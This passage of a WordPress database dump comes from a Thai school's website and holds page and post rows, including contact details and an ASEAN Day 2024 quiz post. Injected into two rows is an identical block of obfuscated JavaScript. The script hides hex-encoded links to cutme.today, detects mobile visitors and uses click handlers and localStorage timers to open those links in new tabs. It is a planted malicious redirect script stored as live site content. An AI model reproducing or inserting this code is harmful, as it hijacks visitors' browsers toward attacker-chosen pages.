{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 14:26:52','2024-08-30 07:26:52','',19,'http://watprato.ssk.in.th/?p=346',0,'revision','',0),
(347,1,'2024-09-02 06:45:49','2024-09-01 23:45:49','','ms','','inherit','open','closed','','ms','','','2024-09-02 06:45:49','2024-09-01 23:45:49','',0,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/ms.html',0,'attachment','text/html',0),
(349,2,'2024-09-03 11:52:41','2024-09-03 04:52:41','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3f4dca20\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"11da9cf6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-724x1024.jpg\" alt=\"\" class=\"wp-image-350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"590c0b46\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457791533_122174879846202781_8796933381137744998_n-1024x727.jpg\" alt=\"\" class=\"wp-image-351\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":356,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457726437_122174879864202781_4352571805851092151_n-1024x727.jpg\" alt=\"\" class=\"wp-image-356\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY 2024 นางสาวสริตา เข็มทอง ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการ ได้นำนักเรียนระดับชั้นมัธยมศึกษาปีที่ 3 จำนวน 2 คน คือ เด็กหญิงเข็มทอง จำปาใด และ เด็กหญิงณัชชา กั้วจำนงค์ เข้าร่วมกิจกรรมวันอาเซียน (ASEAN Day) ร่วมการแข่งขันตอบปัญหาอาเซียน (ASEAN Quiz) ระหว่างวันที่ 6-8 สิงหาคม 2567 ณ กรุงเทพมหานคร จัดโดย กรมอาเซียน กระทรวงการต่างประเทศ โดยมีวัตถุประสงค์เพื่อสร้างองค์ความรู้เกี่ยวกับอาเซียน เสริมสร้างความสัมพันธ์และเครือข่ายระหว่างกรมอาเซียน โรงเรียน และนักเรียนมากยิ่งขึ้นASEAN DAY 2024','','publish','open','open','','asean-day-2024','','','2024-09-03 11:56:15','2024-09-03 04:56:15','',0,'http://watprato.ssk.in.th/?p=349',0,'post','',0),
(350,2,'2024-09-03 11:50:00','2024-09-03 04:50:00','','457381847_122174879558202781_6672815312348190309_n','','inherit','open','closed','','457381847_122174879558202781_6672815312348190309_n','','','2024-09-03 11:50:00','2024-09-03 04:50:00','',349,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n.jpg',0,'attachment','image/jpeg',0),
